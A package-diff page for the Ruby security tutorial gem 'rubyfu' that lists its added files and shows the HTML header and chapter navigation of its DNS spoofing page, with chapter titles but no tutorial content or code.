rubyfu 1.0.1

Sign up to get free protection for your applications and to get access to all the features.
Files changed (151) hide show
  1. checksums.yaml +7 -0
  2. data/README.md +96 -0
  3. data/Rakefile +1 -0
  4. data/_book/beginners.html +1299 -0
  5. data/_book/contribution.html +1350 -0
  6. data/_book/contributors/Ruby_Loves_Us.jpg +0 -0
  7. data/_book/contributors/index.html +1294 -0
  8. data/_book/contributors/todo.html +1293 -0
  9. data/_book/cover.jpg +0 -0
  10. data/_book/faqs/index.html +1308 -0
  11. data/_book/files/module03/dns_spoofing_dns-query.pcap +0 -0
  12. data/_book/files/module03/dns_spoofing_dns-req_res.pcap.pcapng +0 -0
  13. data/_book/files/module06/ftp.pcap +0 -0
  14. data/_book/files/module06/packets.pcap +0 -0
  15. data/_book/gitbook/app.js +25001 -0
  16. data/_book/gitbook/fonts/fontawesome/FontAwesome.otf +0 -0
  17. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.eot +0 -0
  18. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.svg +504 -0
  19. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.ttf +0 -0
  20. data/_book/gitbook/fonts/fontawesome/fontawesome-webfont.woff +0 -0
  21. data/_book/gitbook/images/apple-touch-icon-precomposed-152.png +0 -0
  22. data/_book/gitbook/images/favicon.ico +0 -0
  23. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/README.md +19 -0
  24. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/index.js +57 -0
  25. data/_book/gitbook/plugins/gitbook-plugin-addcssjs/package.json +47 -0
  26. data/_book/gitbook/plugins/gitbook-plugin-anchors/plugin.css +26 -0
  27. data/_book/gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js +30 -0
  28. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css +28 -0
  29. data/_book/gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js +68 -0
  30. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/buttons.js +151 -0
  31. data/_book/gitbook/plugins/gitbook-plugin-fontsettings/website.css +291 -0
  32. data/_book/gitbook/plugins/gitbook-plugin-highlight/ebook.css +131 -0
  33. data/_book/gitbook/plugins/gitbook-plugin-highlight/website.css +426 -0
  34. data/_book/gitbook/plugins/gitbook-plugin-search/lunr.min.js +7 -0
  35. data/_book/gitbook/plugins/gitbook-plugin-search/search.css +27 -0
  36. data/_book/gitbook/plugins/gitbook-plugin-search/search.js +135 -0
  37. data/_book/gitbook/plugins/gitbook-plugin-sharing/buttons.js +93 -0
  38. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.css +22 -0
  39. data/_book/gitbook/plugins/gitbook-plugin-splitter/splitter.js +122 -0
  40. data/_book/gitbook/style.css +9 -0
  41. data/_book/googlec55db2d603c3da8b.html +1 -0
  42. data/_book/images/module02/Cryptography__wiringdiagram.png +0 -0
  43. data/_book/images/module02/packaging__ocra1.png +0 -0
  44. data/_book/images/module03/dns_spoofing_wireshark1.png +0 -0
  45. data/_book/images/module03/dns_spoofing_wireshark2.png +0 -0
  46. data/_book/images/module04/webfu__post_form1.png +0 -0
  47. data/_book/images/module04/webfu__proxy2.png +0 -0
  48. data/_book/images/module04/webfu__twitterAPI1.png +0 -0
  49. data/_book/images/module04/webfu__xmlrpc1.png +0 -0
  50. data/_book/images/module05/msf_template1.png +0 -0
  51. data/_book/images/module06/win-foren__winreg1.png +0 -0
  52. data/_book/images/other/Ruby_Loves_Us.jpg +0 -0
  53. data/_book/images/other/cover.jpg +0 -0
  54. data/_book/images/other/cover_small.jpg +0 -0
  55. data/_book/images/other/logo.png +0 -0
  56. data/_book/images/other/rubyfu.png +0 -0
  57. data/_book/images/other/rubyfu1.png +0 -0
  58. data/_book/images/other/rubyfu3.png +0 -0
  59. data/_book/images/other/rubyfu4.png +0 -0
  60. data/_book/images/other/rubyfu_.png +0 -0
  61. data/_book/index.html +1284 -0
  62. data/_book/module_0x1__basic_ruby_kung_fu/array.html +1297 -0
  63. data/_book/module_0x1__basic_ruby_kung_fu/conversion.html +1386 -0
  64. data/_book/module_0x1__basic_ruby_kung_fu/extraction.html +1346 -0
  65. data/_book/module_0x1__basic_ruby_kung_fu/index.html +1367 -0
  66. data/_book/module_0x1__basic_ruby_kung_fu/string.html +1451 -0
  67. data/_book/module_0x2__system_kung_fu/command_execution.html +1348 -0
  68. data/_book/module_0x2__system_kung_fu/cryptography.html +1396 -0
  69. data/_book/module_0x2__system_kung_fu/email.html +1352 -0
  70. data/_book/module_0x2__system_kung_fu/file_manipulation.html +1371 -0
  71. data/_book/module_0x2__system_kung_fu/index.html +1557 -0
  72. data/_book/module_0x2__system_kung_fu/ncatrb.html +1424 -0
  73. data/_book/module_0x2__system_kung_fu/packaging.md +1 -0
  74. data/_book/module_0x2__system_kung_fu/packaging__ocra1.png +0 -0
  75. data/_book/module_0x2__system_kung_fu/parsing_html,_xml,_json.html +1395 -0
  76. data/_book/module_0x2__system_kung_fu/rce_as_a_service.html +1336 -0
  77. data/_book/module_0x2__system_kung_fu/smtp_enumeration.html +1308 -0
  78. data/_book/module_0x2__system_kung_fu/system_shell.html +1299 -0
  79. data/_book/module_0x2__system_kung_fu/virustotal.html +1318 -0
  80. data/_book/module_0x3__network_kung_fu/Remote_shell.md +19 -0
  81. data/_book/module_0x3__network_kung_fu/arp_spoofing.html +1420 -0
  82. data/_book/module_0x3__network_kung_fu/dns.html +1315 -0
  83. data/_book/module_0x3__network_kung_fu/dns_bruteforce.md +49 -0
  84. data/_book/module_0x3__network_kung_fu/dns_enumeration.html +1371 -0
  85. data/_book/module_0x3__network_kung_fu/dns_spoofing.html +1694 -0
  86. data/_book/module_0x3__network_kung_fu/dns_spoofing_wireshark2.png +0 -0
  87. data/_book/module_0x3__network_kung_fu/ftp.html +1287 -0
  88. data/_book/module_0x3__network_kung_fu/index.html +1392 -0
  89. data/_book/module_0x3__network_kung_fu/network_scanning.html +1339 -0
  90. data/_book/module_0x3__network_kung_fu/network_traffic_analysis.html +1356 -0
  91. data/_book/module_0x3__network_kung_fu/nmap.html +1355 -0
  92. data/_book/module_0x3__network_kung_fu/oracle_tns_enum1.png +0 -0
  93. data/_book/module_0x3__network_kung_fu/packet_manipulation.html +1386 -0
  94. data/_book/module_0x3__network_kung_fu/ruby_socket.html +1553 -0
  95. data/_book/module_0x3__network_kung_fu/snmp_enumeration.html +1314 -0
  96. data/_book/module_0x3__network_kung_fu/ssh.html +1461 -0
  97. data/_book/module_0x3__network_kung_fu/ssid_finder.html +1324 -0
  98. data/_book/module_0x3__network_kung_fu/tns_enumeration.html +1505 -0
  99. data/_book/module_0x4__web_kung_fu/browser_manipulation.html +1630 -0
  100. data/_book/module_0x4__web_kung_fu/databases.html +1531 -0
  101. data/_book/module_0x4__web_kung_fu/extending_burpsuite.html +1303 -0
  102. data/_book/module_0x4__web_kung_fu/index.html +1536 -0
  103. data/_book/module_0x4__web_kung_fu/interacting_with_apis.html +1271 -0
  104. data/_book/module_0x4__web_kung_fu/ruby2javascript.html +1303 -0
  105. data/_book/module_0x4__web_kung_fu/sql_injection_scanner.html +1489 -0
  106. data/_book/module_0x4__web_kung_fu/twitter_api.html +1328 -0
  107. data/_book/module_0x4__web_kung_fu/web_servcies_and_apis.html +1291 -0
  108. data/_book/module_0x4__web_kung_fu/web_server_and_proxy.html +1370 -0
  109. data/_book/module_0x4__web_kung_fu/web_services.html +1394 -0
  110. data/_book/module_0x4__web_kung_fu/webfu__burp-ext1.png +0 -0
  111. data/_book/module_0x4__web_kung_fu/webfu__burp-ext2.png +0 -0
  112. data/_book/module_0x4__web_kung_fu/webfu__burp_setenv1.png +0 -0
  113. data/_book/module_0x4__web_kung_fu/webfu__proxy2.png +0 -0
  114. data/_book/module_0x4__web_kung_fu/webfu__twitterAPI1.png +0 -0
  115. data/_book/module_0x4__web_kung_fu/webfu__xmlrpc1.png +0 -0
  116. data/_book/module_0x4__web_kung_fu/wordpress_api.html +1543 -0
  117. data/_book/module_0x5__exploitation_kung_fu/MSF-struct.png +0 -0
  118. data/_book/module_0x5__exploitation_kung_fu/auxiliary_module.html +1870 -0
  119. data/_book/module_0x5__exploitation_kung_fu/exploit_module.html +1523 -0
  120. data/_book/module_0x5__exploitation_kung_fu/extensions.html +1466 -0
  121. data/_book/module_0x5__exploitation_kung_fu/fuzzer.html +1325 -0
  122. data/_book/module_0x5__exploitation_kung_fu/index.html +1319 -0
  123. data/_book/module_0x5__exploitation_kung_fu/metasm.html +1322 -0
  124. data/_book/module_0x5__exploitation_kung_fu/metasploit.html +1441 -0
  125. data/_book/module_0x5__exploitation_kung_fu/meterpreter.html +1327 -0
  126. data/_book/module_0x5__exploitation_kung_fu/meterpreter_scripting.html +1318 -0
  127. data/_book/module_0x5__exploitation_kung_fu/msf_meter_railgun1.png +0 -0
  128. data/_book/module_0x5__exploitation_kung_fu/msf_template1.png +0 -0
  129. data/_book/module_0x5__exploitation_kung_fu/railgun_api_extension.html +1300 -0
  130. data/_book/module_0x6__forensic/android_forensic.html +1356 -0
  131. data/_book/module_0x6__forensic/index.html +1332 -0
  132. data/_book/module_0x6__forensic/parsing_log_files.html +1375 -0
  133. data/_book/module_0x6__forensic/win-foren__winreg1.png +0 -0
  134. data/_book/module_0x6__forensic/windows_forensic.html +1289 -0
  135. data/_book/package.json +5 -0
  136. data/_book/references/index.html +1338 -0
  137. data/_book/required_gems.html +1342 -0
  138. data/_book/rubyfu_.png +0 -0
  139. data/_book/search_index.json +1 -0
  140. data/_book/styles/ebook.css +1 -0
  141. data/_book/styles/epub.css +1 -0
  142. data/_book/styles/header.js +5 -0
  143. data/_book/styles/mobi.css +1 -0
  144. data/_book/styles/pdf.css +1 -0
  145. data/_book/styles/website.css +41 -0
  146. data/bin/rubyfu +48 -0
  147. data/lib/rubyfu.rb +36 -0
  148. data/lib/rubyfu/browse.rb +35 -0
  149. data/lib/rubyfu/version.rb +3 -0
  150. data/lib/rubyfu/webserver.rb +30 -0
  151. metadata +210 -0
data/_book/module_0x3__network_kung_fu/dns_spoofing.html ADDED
@@ -0,0 +1,1694 @@
1
+ <!DOCTYPE HTML>
2
+ <html lang="en" >
3
+
4
+ <head>
5
+
6
+ <meta charset="UTF-8">
7
+ <meta http-equiv="X-UA-Compatible" content="IE=edge" />
8
+ <title>DNS Spoofing | RubyFu</title>
9
+ <meta content="text/html; charset=utf-8" http-equiv="Content-Type">
10
+ <meta name="description" content="">
11
+ <meta name="generator" content="GitBook 2.6.2">
12
+
13
+
14
+ <meta name="HandheldFriendly" content="true"/>
15
+ <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
16
+ <meta name="apple-mobile-web-app-capable" content="yes">
17
+ <meta name="apple-mobile-web-app-status-bar-style" content="black">
18
+ <link rel="apple-touch-icon-precomposed" sizes="152x152" href="../gitbook/images/apple-touch-icon-precomposed-152.png">
19
+ <link rel="shortcut icon" href="../gitbook/images/favicon.ico" type="image/x-icon">
20
+
21
+ <link rel="stylesheet" href="../gitbook/style.css">
22
+
23
+
24
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-anchors/plugin.css">
25
+
26
+
27
+
28
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-splitter/splitter.css">
29
+
30
+
31
+
32
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.css">
33
+
34
+
35
+
36
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-highlight/website.css">
37
+
38
+
39
+
40
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-search/search.css">
41
+
42
+
43
+
44
+ <link rel="stylesheet" href="../gitbook/plugins/gitbook-plugin-fontsettings/website.css">
45
+
46
+
47
+
48
+ <link rel="stylesheet" href="../styles/website.css">
49
+
50
+
51
+
52
+
53
+
54
+ <link rel="next" href="../module_0x4__web_kung_fu/index.html" />
55
+
56
+
57
+ <link rel="prev" href="../module_0x3__network_kung_fu/arp_spoofing.html" />
58
+
59
+
60
+ <script type="text/javascript" src="../styles/header.js"></script>
61
+ </head>
62
+ <body>
63
+
64
+
65
+ <div class="book"
66
+ data-level="3.10.2"
67
+ data-chapter-title="DNS Spoofing"
68
+ data-filepath="module_0x3__network_kung_fu/dns_spoofing.md"
69
+ data-basepath=".."
70
+ data-revision="Wed Jan 27 2016 09:00:51 GMT+0300 (AST)"
71
+ data-innerlanguage="">
72
+
73
+
74
+ <div class="book-summary">
75
+ <nav role="navigation">
76
+ <ul class="summary">
77
+
78
+
79
+
80
+
81
+
82
+
83
+
84
+
85
+
86
+ <li class="chapter " data-level="0" data-path="index.html">
87
+
88
+
89
+ <a href="../index.html">
90
+
91
+ <i class="fa fa-check"></i>
92
+
93
+ Module 0x0 | Introduction
94
+ </a>
95
+
96
+
97
+ <ul class="articles">
98
+
99
+
100
+ <li class="chapter " data-level="0.1" data-path="contribution.html">
101
+
102
+
103
+ <a href="../contribution.html">
104
+
105
+ <i class="fa fa-check"></i>
106
+
107
+ <b>0.1.</b>
108
+
109
+ Contribution
110
+ </a>
111
+
112
+
113
+ </li>
114
+
115
+ <li class="chapter " data-level="0.2" data-path="beginners.html">
116
+
117
+
118
+ <a href="../beginners.html">
119
+
120
+ <i class="fa fa-check"></i>
121
+
122
+ <b>0.2.</b>
123
+
124
+ Beginners
125
+ </a>
126
+
127
+
128
+ </li>
129
+
130
+ <li class="chapter " data-level="0.3" data-path="required_gems.html">
131
+
132
+
133
+ <a href="../required_gems.html">
134
+
135
+ <i class="fa fa-check"></i>
136
+
137
+ <b>0.3.</b>
138
+
139
+ Required Gems
140
+ </a>
141
+
142
+
143
+ </li>
144
+
145
+
146
+ </ul>
147
+
148
+ </li>
149
+
150
+ <li class="chapter " data-level="1" data-path="module_0x1__basic_ruby_kung_fu/index.html">
151
+
152
+
153
+ <a href="../module_0x1__basic_ruby_kung_fu/index.html">
154
+
155
+ <i class="fa fa-check"></i>
156
+
157
+ <b>1.</b>
158
+
159
+ Module 0x1 | Basic Ruby Kung Fu
160
+ </a>
161
+
162
+
163
+ <ul class="articles">
164
+
165
+
166
+ <li class="chapter " data-level="1.1" data-path="module_0x1__basic_ruby_kung_fu/string.html">
167
+
168
+
169
+ <a href="../module_0x1__basic_ruby_kung_fu/string.html">
170
+
171
+ <i class="fa fa-check"></i>
172
+
173
+ <b>1.1.</b>
174
+
175
+ String
176
+ </a>
177
+
178
+
179
+ <ul class="articles">
180
+
181
+
182
+ <li class="chapter " data-level="1.1.1" data-path="module_0x1__basic_ruby_kung_fu/conversion.html">
183
+
184
+
185
+ <a href="../module_0x1__basic_ruby_kung_fu/conversion.html">
186
+
187
+ <i class="fa fa-check"></i>
188
+
189
+ <b>1.1.1.</b>
190
+
191
+ Conversion
192
+ </a>
193
+
194
+
195
+ </li>
196
+
197
+ <li class="chapter " data-level="1.1.2" data-path="module_0x1__basic_ruby_kung_fu/extraction.html">
198
+
199
+
200
+ <a href="../module_0x1__basic_ruby_kung_fu/extraction.html">
201
+
202
+ <i class="fa fa-check"></i>
203
+
204
+ <b>1.1.2.</b>
205
+
206
+ Extraction
207
+ </a>
208
+
209
+
210
+ </li>
211
+
212
+
213
+ </ul>
214
+
215
+ </li>
216
+
217
+ <li class="chapter " data-level="1.2" data-path="module_0x1__basic_ruby_kung_fu/array.html">
218
+
219
+
220
+ <a href="../module_0x1__basic_ruby_kung_fu/array.html">
221
+
222
+ <i class="fa fa-check"></i>
223
+
224
+ <b>1.2.</b>
225
+
226
+ Array
227
+ </a>
228
+
229
+
230
+ </li>
231
+
232
+
233
+ </ul>
234
+
235
+ </li>
236
+
237
+ <li class="chapter " data-level="2" data-path="module_0x2__system_kung_fu/index.html">
238
+
239
+
240
+ <a href="../module_0x2__system_kung_fu/index.html">
241
+
242
+ <i class="fa fa-check"></i>
243
+
244
+ <b>2.</b>
245
+
246
+ Module 0x2 | System Kung Fu
247
+ </a>
248
+
249
+
250
+ <ul class="articles">
251
+
252
+
253
+ <li class="chapter " data-level="2.1" data-path="module_0x2__system_kung_fu/command_execution.html">
254
+
255
+
256
+ <a href="../module_0x2__system_kung_fu/command_execution.html">
257
+
258
+ <i class="fa fa-check"></i>
259
+
260
+ <b>2.1.</b>
261
+
262
+ Command Execution
263
+ </a>
264
+
265
+
266
+ </li>
267
+
268
+ <li class="chapter " data-level="2.2" data-path="module_0x2__system_kung_fu/file_manipulation.html">
269
+
270
+
271
+ <a href="../module_0x2__system_kung_fu/file_manipulation.html">
272
+
273
+ <i class="fa fa-check"></i>
274
+
275
+ <b>2.2.</b>
276
+
277
+ File manipulation
278
+ </a>
279
+
280
+
281
+ <ul class="articles">
282
+
283
+
284
+ <li class="chapter " data-level="2.2.1" data-path="module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
285
+
286
+
287
+ <a href="../module_0x2__system_kung_fu/parsing_html,_xml,_json.html">
288
+
289
+ <i class="fa fa-check"></i>
290
+
291
+ <b>2.2.1.</b>
292
+
293
+ Parsing HTML, XML, JSON
294
+ </a>
295
+
296
+
297
+ </li>
298
+
299
+
300
+ </ul>
301
+
302
+ </li>
303
+
304
+ <li class="chapter " data-level="2.3" data-path="module_0x2__system_kung_fu/cryptography.html">
305
+
306
+
307
+ <a href="../module_0x2__system_kung_fu/cryptography.html">
308
+
309
+ <i class="fa fa-check"></i>
310
+
311
+ <b>2.3.</b>
312
+
313
+ Cryptography
314
+ </a>
315
+
316
+
317
+ </li>
318
+
319
+ <li class="chapter " data-level="2.4" data-path="module_0x2__system_kung_fu/system_shell.html">
320
+
321
+
322
+ <a href="../module_0x2__system_kung_fu/system_shell.html">
323
+
324
+ <i class="fa fa-check"></i>
325
+
326
+ <b>2.4.</b>
327
+
328
+ Remote Shell
329
+ </a>
330
+
331
+
332
+ <ul class="articles">
333
+
334
+
335
+ <li class="chapter " data-level="2.4.1" data-path="module_0x2__system_kung_fu/ncatrb.html">
336
+
337
+
338
+ <a href="../module_0x2__system_kung_fu/ncatrb.html">
339
+
340
+ <i class="fa fa-check"></i>
341
+
342
+ <b>2.4.1.</b>
343
+
344
+ Ncat.rb
345
+ </a>
346
+
347
+
348
+ </li>
349
+
350
+ <li class="chapter " data-level="2.4.2" data-path="module_0x2__system_kung_fu/rce_as_a_service.html">
351
+
352
+
353
+ <a href="../module_0x2__system_kung_fu/rce_as_a_service.html">
354
+
355
+ <i class="fa fa-check"></i>
356
+
357
+ <b>2.4.2.</b>
358
+
359
+ RCE as a Service
360
+ </a>
361
+
362
+
363
+ </li>
364
+
365
+
366
+ </ul>
367
+
368
+ </li>
369
+
370
+ <li class="chapter " data-level="2.5" data-path="module_0x2__system_kung_fu/virustotal.html">
371
+
372
+
373
+ <a href="../module_0x2__system_kung_fu/virustotal.html">
374
+
375
+ <i class="fa fa-check"></i>
376
+
377
+ <b>2.5.</b>
378
+
379
+ VirusTotal
380
+ </a>
381
+
382
+
383
+ </li>
384
+
385
+
386
+ </ul>
387
+
388
+ </li>
389
+
390
+ <li class="chapter " data-level="3" data-path="module_0x3__network_kung_fu/index.html">
391
+
392
+
393
+ <a href="../module_0x3__network_kung_fu/index.html">
394
+
395
+ <i class="fa fa-check"></i>
396
+
397
+ <b>3.</b>
398
+
399
+ Module 0x3 | Network Kung Fu
400
+ </a>
401
+
402
+
403
+ <ul class="articles">
404
+
405
+
406
+ <li class="chapter " data-level="3.1" data-path="module_0x3__network_kung_fu/ruby_socket.html">
407
+
408
+
409
+ <a href="../module_0x3__network_kung_fu/ruby_socket.html">
410
+
411
+ <i class="fa fa-check"></i>
412
+
413
+ <b>3.1.</b>
414
+
415
+ Ruby Socket
416
+ </a>
417
+
418
+
419
+ </li>
420
+
421
+ <li class="chapter " data-level="3.2" data-path="module_0x3__network_kung_fu/ssid_finder.html">
422
+
423
+
424
+ <a href="../module_0x3__network_kung_fu/ssid_finder.html">
425
+
426
+ <i class="fa fa-check"></i>
427
+
428
+ <b>3.2.</b>
429
+
430
+ SSID Finder
431
+ </a>
432
+
433
+
434
+ </li>
435
+
436
+ <li class="chapter " data-level="3.3" data-path="module_0x3__network_kung_fu/ftp.html">
437
+
438
+
439
+ <a href="../module_0x3__network_kung_fu/ftp.html">
440
+
441
+ <i class="fa fa-check"></i>
442
+
443
+ <b>3.3.</b>
444
+
445
+ FTP
446
+ </a>
447
+
448
+
449
+ </li>
450
+
451
+ <li class="chapter " data-level="3.4" data-path="module_0x3__network_kung_fu/ssh.html">
452
+
453
+
454
+ <a href="../module_0x3__network_kung_fu/ssh.html">
455
+
456
+ <i class="fa fa-check"></i>
457
+
458
+ <b>3.4.</b>
459
+
460
+ SSH
461
+ </a>
462
+
463
+
464
+ </li>
465
+
466
+ <li class="chapter " data-level="3.5" data-path="module_0x2__system_kung_fu/email.html">
467
+
468
+
469
+ <a href="../module_0x2__system_kung_fu/email.html">
470
+
471
+ <i class="fa fa-check"></i>
472
+
473
+ <b>3.5.</b>
474
+
475
+ Email
476
+ </a>
477
+
478
+
479
+ <ul class="articles">
480
+
481
+
482
+ <li class="chapter " data-level="3.5.1" data-path="module_0x2__system_kung_fu/smtp_enumeration.html">
483
+
484
+
485
+ <a href="../module_0x2__system_kung_fu/smtp_enumeration.html">
486
+
487
+ <i class="fa fa-check"></i>
488
+
489
+ <b>3.5.1.</b>
490
+
491
+ SMTP Enumeration
492
+ </a>
493
+
494
+
495
+ </li>
496
+
497
+
498
+ </ul>
499
+
500
+ </li>
501
+
502
+ <li class="chapter " data-level="3.6" data-path="module_0x3__network_kung_fu/network_scanning.html">
503
+
504
+
505
+ <a href="../module_0x3__network_kung_fu/network_scanning.html">
506
+
507
+ <i class="fa fa-check"></i>
508
+
509
+ <b>3.6.</b>
510
+
511
+ Network Scanning
512
+ </a>
513
+
514
+
515
+ <ul class="articles">
516
+
517
+
518
+ <li class="chapter " data-level="3.6.1" data-path="module_0x3__network_kung_fu/nmap.html">
519
+
520
+
521
+ <a href="../module_0x3__network_kung_fu/nmap.html">
522
+
523
+ <i class="fa fa-check"></i>
524
+
525
+ <b>3.6.1.</b>
526
+
527
+ Nmap
528
+ </a>
529
+
530
+
531
+ </li>
532
+
533
+
534
+ </ul>
535
+
536
+ </li>
537
+
538
+ <li class="chapter " data-level="3.7" data-path="module_0x3__network_kung_fu/dns.html">
539
+
540
+
541
+ <a href="../module_0x3__network_kung_fu/dns.html">
542
+
543
+ <i class="fa fa-check"></i>
544
+
545
+ <b>3.7.</b>
546
+
547
+ DNS
548
+ </a>
549
+
550
+
551
+ <ul class="articles">
552
+
553
+
554
+ <li class="chapter " data-level="3.7.1" data-path="module_0x3__network_kung_fu/dns_enumeration.html">
555
+
556
+
557
+ <a href="../module_0x3__network_kung_fu/dns_enumeration.html">
558
+
559
+ <i class="fa fa-check"></i>
560
+
561
+ <b>3.7.1.</b>
562
+
563
+ DNS Enumeration
564
+ </a>
565
+
566
+
567
+ </li>
568
+
569
+
570
+ </ul>
571
+
572
+ </li>
573
+
574
+ <li class="chapter " data-level="3.8" data-path="module_0x3__network_kung_fu/snmp_enumeration.html">
575
+
576
+
577
+ <a href="../module_0x3__network_kung_fu/snmp_enumeration.html">
578
+
579
+ <i class="fa fa-check"></i>
580
+
581
+ <b>3.8.</b>
582
+
583
+ SNMP Enumeration
584
+ </a>
585
+
586
+
587
+ </li>
588
+
589
+ <li class="chapter " data-level="3.9" data-path="module_0x3__network_kung_fu/tns_enumeration.html">
590
+
591
+
592
+ <a href="../module_0x3__network_kung_fu/tns_enumeration.html">
593
+
594
+ <i class="fa fa-check"></i>
595
+
596
+ <b>3.9.</b>
597
+
598
+ Oracle TNS Enumeration
599
+ </a>
600
+
601
+
602
+ </li>
603
+
604
+ <li class="chapter " data-level="3.10" data-path="module_0x3__network_kung_fu/packet_manipulation.html">
605
+
606
+
607
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html">
608
+
609
+ <i class="fa fa-check"></i>
610
+
611
+ <b>3.10.</b>
612
+
613
+ Packet manipulation
614
+ </a>
615
+
616
+
617
+ <ul class="articles">
618
+
619
+
620
+ <li class="chapter " data-level="3.10.1" data-path="module_0x3__network_kung_fu/arp_spoofing.html">
621
+
622
+
623
+ <a href="../module_0x3__network_kung_fu/arp_spoofing.html">
624
+
625
+ <i class="fa fa-check"></i>
626
+
627
+ <b>3.10.1.</b>
628
+
629
+ ARP Spoofing
630
+ </a>
631
+
632
+
633
+ </li>
634
+
635
+ <li class="chapter active" data-level="3.10.2" data-path="module_0x3__network_kung_fu/dns_spoofing.html">
636
+
637
+
638
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html">
639
+
640
+ <i class="fa fa-check"></i>
641
+
642
+ <b>3.10.2.</b>
643
+
644
+ DNS Spoofing
645
+ </a>
646
+
647
+
648
+ </li>
649
+
650
+
651
+ </ul>
652
+
653
+ </li>
654
+
655
+
656
+ </ul>
657
+
658
+ </li>
659
+
660
+ <li class="chapter " data-level="4" data-path="module_0x4__web_kung_fu/index.html">
661
+
662
+
663
+ <a href="../module_0x4__web_kung_fu/index.html">
664
+
665
+ <i class="fa fa-check"></i>
666
+
667
+ <b>4.</b>
668
+
669
+ Module 0x4 | Web Kung Fu
670
+ </a>
671
+
672
+
673
+ <ul class="articles">
674
+
675
+
676
+ <li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
677
+
678
+
679
+ <a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
680
+
681
+ <i class="fa fa-check"></i>
682
+
683
+ <b>4.1.</b>
684
+
685
+ SQL Injection Scanner
686
+ </a>
687
+
688
+
689
+ </li>
690
+
691
+ <li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
692
+
693
+
694
+ <a href="../module_0x4__web_kung_fu/databases.html">
695
+
696
+ <i class="fa fa-check"></i>
697
+
698
+ <b>4.2.</b>
699
+
700
+ Databases
701
+ </a>
702
+
703
+
704
+ </li>
705
+
706
+ <li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
707
+
708
+
709
+ <a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
710
+
711
+ <i class="fa fa-check"></i>
712
+
713
+ <b>4.3.</b>
714
+
715
+ Extending Burp Suite
716
+ </a>
717
+
718
+
719
+ </li>
720
+
721
+ <li class="chapter " data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
722
+
723
+
724
+ <a href="../module_0x4__web_kung_fu/browser_manipulation.html">
725
+
726
+ <i class="fa fa-check"></i>
727
+
728
+ <b>4.4.</b>
729
+
730
+ Browser Manipulation
731
+ </a>
732
+
733
+
734
+ </li>
735
+
736
+ <li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
737
+
738
+
739
+ <a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
740
+
741
+ <i class="fa fa-check"></i>
742
+
743
+ <b>4.5.</b>
744
+
745
+ Web Services and APIs
746
+ </a>
747
+
748
+
749
+ <ul class="articles">
750
+
751
+
752
+ <li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
753
+
754
+
755
+ <a href="../module_0x4__web_kung_fu/web_services.html">
756
+
757
+ <i class="fa fa-check"></i>
758
+
759
+ <b>4.5.1.</b>
760
+
761
+ Interacting with Web Services
762
+ </a>
763
+
764
+
765
+ </li>
766
+
767
+ <li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
768
+
769
+
770
+ <a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
771
+
772
+ <i class="fa fa-check"></i>
773
+
774
+ <b>4.5.2.</b>
775
+
776
+ Interacting with APIs
777
+ </a>
778
+
779
+
780
+ <ul class="articles">
781
+
782
+
783
+ <li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
784
+
785
+
786
+ <a href="../module_0x4__web_kung_fu/wordpress_api.html">
787
+
788
+ <i class="fa fa-check"></i>
789
+
790
+ <b>4.5.2.1.</b>
791
+
792
+ WordPress API
793
+ </a>
794
+
795
+
796
+ </li>
797
+
798
+ <li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
799
+
800
+
801
+ <a href="../module_0x4__web_kung_fu/twitter_api.html">
802
+
803
+ <i class="fa fa-check"></i>
804
+
805
+ <b>4.5.2.2.</b>
806
+
807
+ Twitter API
808
+ </a>
809
+
810
+
811
+ </li>
812
+
813
+
814
+ </ul>
815
+
816
+ </li>
817
+
818
+
819
+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
